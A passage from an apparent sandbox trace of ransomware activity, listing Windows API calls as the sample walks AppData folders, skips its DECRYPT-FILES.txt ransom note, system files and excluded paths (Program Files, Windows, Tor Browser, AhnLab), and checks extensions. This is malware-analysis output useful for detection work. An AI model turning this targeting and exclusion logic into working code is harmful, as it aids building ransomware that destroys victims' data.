returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\1b4dd67f29cb1962.automaticDestinations-ms.r5EqSX" [0186.461] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.461] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\AutomaticDestinations\\1b4dd67f29cb1962.automaticDestinations-ms.r5EqSX" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\recent\\automaticdestinations\\1b4dd67f29cb1962.automaticdestinations-ms.r5eqsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.461] CloseHandle (hObject=0x0) returned 0 [0186.461] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.461] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0be4480, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0be4480, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0be4480, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0186.461] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0186.461] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0be4480, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0be4480, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0be4480, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 0 [0186.461] FindClose (in: hFindFile=0x4799b8 | out: hFindFile=0x4799b8) returned 1 [0186.462] CloseHandle (hObject=0xffffffff) returned 0 [0186.462] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0c568a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0c568a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="CustomDestinations", cAlternateFileName="CUSTOM~1")) returned 1 [0186.462] lstrcmpW (lpString1="CustomDestinations", lpString2=".") returned 1 [0186.462] lstrcmpW (lpString1="CustomDestinations", lpString2="..") returned 1 [0186.462] lstrcatW (in: lpString1="CustomDestinations", lpString2="\\" | out: lpString1="CustomDestinations\\") returned="CustomDestinations\\" [0186.462] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\", lpString2="CustomDestinations\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\" [0186.462] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\", lpSrch="\\Program Files") returned 0x0 [0186.462] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\", lpSrch=":\\Windows") returned 0x0 [0186.462] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\", lpSrch="\\Games\\") returned 0x0 [0186.462] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\", lpSrch="\\Tor Browser\\") returned 0x0 [0186.462] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\", lpSrch="\\ProgramData\\") returned 0x0 [0186.462] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0186.462] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0186.462] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0186.462] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\", lpSrch="\\All Users") returned 0x0 [0186.462] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\", lpSrch="\\IETldCache\\") returned 0x0 [0186.462] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\", lpSrch="\\Local Settings\\") returned 0x0 [0186.462] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\", lpSrch="\\AppData\\Local") returned 0x0 [0186.462] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\", lpSrch="AhnLab") returned 0x0 [0186.463] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0186.463] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\") returned 77 [0186.463] lstrlenW (lpString="0a16c9.tmp") returned 10 [0186.463] wsprintfW (in: param_1=0x36fe07c, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\\\0a16c9.tmp") returned 88 [0186.463] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\\\0a16c9.tmp" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0xffffffff [0186.469] GetLastError () returned 0x5 [0186.469] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\") returned 77 [0186.469] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0186.469] wsprintfW (in: param_1=0x36fe07c, param_2="%s\\%s" | out: param_1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\\\DECRYPT-FILES.txt") returned 95 [0186.469] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.470] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\") returned 77 [0186.470] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\", lpString2="*" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\*") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\*" [0186.470] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\*", lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0c568a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0c568a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x4799b8 [0186.471] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0186.471] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x62fa4a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xb0c568a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0c568a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0186.471] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0186.471] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0186.471] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6404e40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6404e40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xb0c30740, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x120, dwReserved0=0x0, dwReserved1=0x0, cFileName="1b4dd67f29cb1962.customDestinations-ms.j4Hh5Wa", cAlternateFileName="1B4DD6~1.J4H")) returned 1 [0186.471] lstrcmpiW (lpString1="1b4dd67f29cb1962.customDestinations-ms.j4Hh5Wa", lpString2="DECRYPT-FILES.txt") returned -1 [0186.471] lstrcmpiW (lpString1="1b4dd67f29cb1962.customDestinations-ms.j4Hh5Wa", lpString2="autorun.inf") returned -1 [0186.471] lstrcmpiW (lpString1="1b4dd67f29cb1962.customDestinations-ms.j4Hh5Wa", lpString2="boot.ini") returned -1 [0186.471] lstrcmpiW (lpString1="1b4dd67f29cb1962.customDestinations-ms.j4Hh5Wa", lpString2="desktop.ini") returned -1 [0186.471] lstrcmpiW (lpString1="1b4dd67f29cb1962.customDestinations-ms.j4Hh5Wa", lpString2="ntuser.dat") returned -1 [0186.471] lstrcmpiW (lpString1="1b4dd67f29cb1962.customDestinations-ms.j4Hh5Wa", lpString2="iconcache.db") returned -1 [0186.471] lstrcmpiW (lpString1="1b4dd67f29cb1962.customDestinations-ms.j4Hh5Wa", lpString2="bootsect.bak") returned -1 [0186.471] lstrcmpiW (lpString1="1b4dd67f29cb1962.customDestinations-ms.j4Hh5Wa", lpString2="ntuser.dat.log") returned -1 [0186.471] lstrcmpiW (lpString1="1b4dd67f29cb1962.customDestinations-ms.j4Hh5Wa", lpString2="thumbs.db") returned -1 [0186.471] lstrcmpiW (lpString1="1b4dd67f29cb1962.customDestinations-ms.j4Hh5Wa", lpString2="Bootfont.bin") returned -1 [0186.471] lstrlenW (lpString="1b4dd67f29cb1962.customDestinations-ms.j4Hh5Wa") returned 46 [0186.471] lstrcmpiW (lpString1="j4Hh5Wa", lpString2="lnk") returned -1 [0186.471] lstrcmpiW (lpString1="j4Hh5Wa", lpString2="exe") returned 1 [0186.471] lstrcmpiW (lpString1="j4Hh5Wa", lpString2="sys") returned -1 [0186.471] lstrcmpiW (lpString1="j4Hh5Wa", lpString2="dll") returned 1 [0186.472] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\") returned 77 [0186.472] lstrlenW (lpString="1b4dd67f29cb1962.customDestinations-ms.j4Hh5Wa") returned 46 [0186.472] lstrcpyW (in: lpString1=0x36fe06c, lpString2="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\" [0186.472] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\", lpString2="1b4dd67f29cb1962.customDestinations-ms.j4Hh5Wa" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\1b4dd67f29cb1962.customDestinations-ms.j4Hh5Wa") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\1b4dd67f29cb1962.customDestinations-ms.j4Hh5Wa" [0186.472] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.472] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\1b4dd67f29cb1962.customDestinations-ms.j4Hh5Wa" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\1b4dd67f29cb1962.customdestinations-ms.j4hh5wa"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.472] CloseHandle (hObject=0x0) returned 0 [0186.472] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.472] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6404e40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6404e40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xb0c30740, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x3d1a, dwReserved0=0x0, dwReserved1=0x0, cFileName="5afe4de1b92fc382.customDestinations-ms.j4Hh5Wa", cAlternateFileName="5AFE4D~1.J4H")) returned 1 [0186.472] lstrcmpiW (lpString1="5afe4de1b92fc382.customDestinations-ms.j4Hh5Wa", lpString2="DECRYPT-FILES.txt") returned -1 [0186.472] lstrcmpiW (lpString1="5afe4de1b92fc382.customDestinations-ms.j4Hh5Wa", lpString2="autorun.inf") returned -1 [0186.472] lstrcmpiW (lpString1="5afe4de1b92fc382.customDestinations-ms.j4Hh5Wa", lpString2="boot.ini") returned -1 [0186.472] lstrcmpiW (lpString1="5afe4de1b92fc382.customDestinations-ms.j4Hh5Wa", lpString2="desktop.ini") returned -1 [0186.472] lstrcmpiW (lpString1="5afe4de1b92fc382.customDestinations-ms.j4Hh5Wa", lpString2="ntuser.dat") returned -1 [0186.472] lstrcmpiW (lpString1="5afe4de1b92fc382.customDestinations-ms.j4Hh5Wa", lpString2="iconcache.db") returned -1 [0186.472] lstrcmpiW (lpString1="5afe4de1b92fc382.customDestinations-ms.j4Hh5Wa", lpString2="bootsect.bak") returned -1 [0186.472] lstrcmpiW (lpString1="5afe4de1b92fc382.customDestinations-ms.j4Hh5Wa", lpString2="ntuser.dat.log") returned -1 [0186.472] lstrcmpiW (lpString1="5afe4de1b92fc382.customDestinations-ms.j4Hh5Wa", lpString2="thumbs.db") returned -1 [0186.472] lstrcmpiW (lpString1="5afe4de1b92fc382.customDestinations-ms.j4Hh5Wa", lpString2="Bootfont.bin") returned -1 [0186.472] lstrlenW (lpString="5afe4de1b92fc382.customDestinations-ms.j4Hh5Wa") returned 46 [0186.473] lstrcmpiW (lpString1="j4Hh5Wa", lpString2="lnk") returned -1 [0186.473] lstrcmpiW (lpString1="j4Hh5Wa", lpString2="exe") returned 1 [0186.473] lstrcmpiW (lpString1="j4Hh5Wa", lpString2="sys") returned -1 [0186.473] lstrcmpiW (lpString1="j4Hh5Wa", lpString2="dll") returned 1 [0186.473] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\") returned 77 [0186.473] lstrlenW (lpString="5afe4de1b92fc382.customDestinations-ms.j4Hh5Wa") returned 46 [0186.473] lstrcpyW (in: lpString1=0x36fe06c, lpString2="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\" [0186.473] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\", lpString2="5afe4de1b92fc382.customDestinations-ms.j4Hh5Wa" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\5afe4de1b92fc382.customDestinations-ms.j4Hh5Wa") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\5afe4de1b92fc382.customDestinations-ms.j4Hh5Wa" [0186.473] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.473] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\5afe4de1b92fc382.customDestinations-ms.j4Hh5Wa" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\5afe4de1b92fc382.customdestinations-ms.j4hh5wa"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.473] CloseHandle (hObject=0x0) returned 0 [0186.473] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.473] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6404e40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6404e40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xb0c568a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x120, dwReserved0=0x0, dwReserved1=0x0, cFileName="7e4dca80246863e3.customDestinations-ms.EvvTgFj", cAlternateFileName="7E4DCA~1.EVV")) returned 1 [0186.473] lstrcmpiW (lpString1="7e4dca80246863e3.customDestinations-ms.EvvTgFj", lpString2="DECRYPT-FILES.txt") returned -1 [0186.473] lstrcmpiW (lpString1="7e4dca80246863e3.customDestinations-ms.EvvTgFj", lpString2="autorun.inf") returned -1 [0186.473] lstrcmpiW (lpString1="7e4dca80246863e3.customDestinations-ms.EvvTgFj", lpString2="boot.ini") returned -1 [0186.473] lstrcmpiW (lpString1="7e4dca80246863e3.customDestinations-ms.EvvTgFj", lpString2="desktop.ini") returned -1 [0186.473] lstrcmpiW (lpString1="7e4dca80246863e3.customDestinations-ms.EvvTgFj", lpString2="ntuser.dat") returned -1 [0186.473] lstrcmpiW (lpString1="7e4dca80246863e3.customDestinations-ms.EvvTgFj", lpString2="iconcache.db") returned -1 [0186.473] lstrcmpiW (lpString1="7e4dca80246863e3.customDestinations-ms.EvvTgFj", lpString2="bootsect.bak") returned -1 [0186.474] lstrcmpiW (lpString1="7e4dca80246863e3.customDestinations-ms.EvvTgFj", lpString2="ntuser.dat.log") returned -1 [0186.474] lstrcmpiW (lpString1="7e4dca80246863e3.customDestinations-ms.EvvTgFj", lpString2="thumbs.db") returned -1 [0186.474] lstrcmpiW (lpString1="7e4dca80246863e3.customDestinations-ms.EvvTgFj", lpString2="Bootfont.bin") returned -1 [0186.474] lstrlenW (lpString="7e4dca80246863e3.customDestinations-ms.EvvTgFj") returned 46 [0186.474] lstrcmpiW (lpString1="EvvTgFj", lpString2="lnk") returned -1 [0186.474] lstrcmpiW (lpString1="EvvTgFj", lpString2="exe") returned -1 [0186.474] lstrcmpiW (lpString1="EvvTgFj", lpString2="sys") returned -1 [0186.474] lstrcmpiW (lpString1="EvvTgFj", lpString2="dll") returned 1 [0186.474] lstrlenW (lpString="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\") returned 77 [0186.474] lstrlenW (lpString="7e4dca80246863e3.customDestinations-ms.EvvTgFj") returned 46 [0186.474] lstrcpyW (in: lpString1=0x36fe06c, lpString2="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\" [0186.474] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\", lpString2="7e4dca80246863e3.customDestinations-ms.EvvTgFj" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\7e4dca80246863e3.customDestinations-ms.EvvTgFj") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\7e4dca80246863e3.customDestinations-ms.EvvTgFj" [0186.474] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0186.474] CreateFileW (lpFileName="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\7e4dca80246863e3.customDestinations-ms.EvvTgFj" (normalized: "c:\\users\\default\\appdata\\roaming\\microsoft\\windows\\recent\\customdestinations\\7e4dca80246863e3.customdestinations-ms.evvtgfj"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0186.474] CloseHandle (hObject=0x0) returned 0 [0186.474] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0186.474] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0c0a5e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0c0a5e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0c0a5e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0186.474] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0186.474] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0c0a5e0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0c0a5e0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0c0a5e0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 0 [0186.475] FindClose (in: hFindFile=0x4799b8 | out: hFindFile=0x4799b8) returned 1 [0186.475] CloseHandle (hObject=0xffffffff) returned 0 [0186.475] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb0be4480, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xb0be4480, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0be4480, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0186.475] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0186.475] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6404e40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6404e40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd88b51cb, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x1b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0186.475] lstrcmpiW (lpString1="desktop.ini", lpString2="DECRYPT-FILES.txt") returned 1 [0186.475] lstrcmpiW (lpString1="desktop.ini", lpString2="autorun.inf") returned 1 [0186.475] lstrcmpiW (lpString1="desktop.ini", lpString2="boot.ini") returned 1 [0186.475] lstrcmpiW (lpString1="desktop.ini", lpString2="desktop.ini") returned 0 [0186.475] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6404e40, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x6404e40, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0xd88b51cb, ftLastWriteTime.dwHighDateTime=0x1cb892d, nFileSizeHigh=0x0, nFileSizeLow=0x1b0, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0186.475] FindClose (in: hFindFile=0x479978 | out: hFindFile=0x479978) returned 1 [0186.476] CloseHandle (hObject=0xffffffff) returned 0 [0186.476] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfda27f60, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xb0f76580, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xb0f76580, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="SendTo", cAlternateFileName="")) returned 1 [0186.476] lstrcmpW (lpString1="SendTo", lpString2=".") returned 1 [0186.476] lstrcmpW (lpString1="SendTo", lpString2="..") returned 1 [0186.476] lstrcatW (in: lpString1="SendTo", lpString2="\\" | out: lpString1="SendTo\\") returned="SendTo\\" [0186.476] lstrcatW (in: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\", lpString2="SendTo\\" | out: lpString1="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\") returned="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\" [0186.476] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\", lpSrch="\\Program Files") returned 0x0 [0186.476] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\", lpSrch=":\\Windows") returned 0x0 [0186.476] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\", lpSrch="\\Games\\") returned 0x0 [0186.476] StrStrW (lpFirst="C:\\Users\\Default\\AppData\\Roaming\\Microsoft\\Windows\\SendTo\\", lpSrch="\\Tor Browser\\") returned 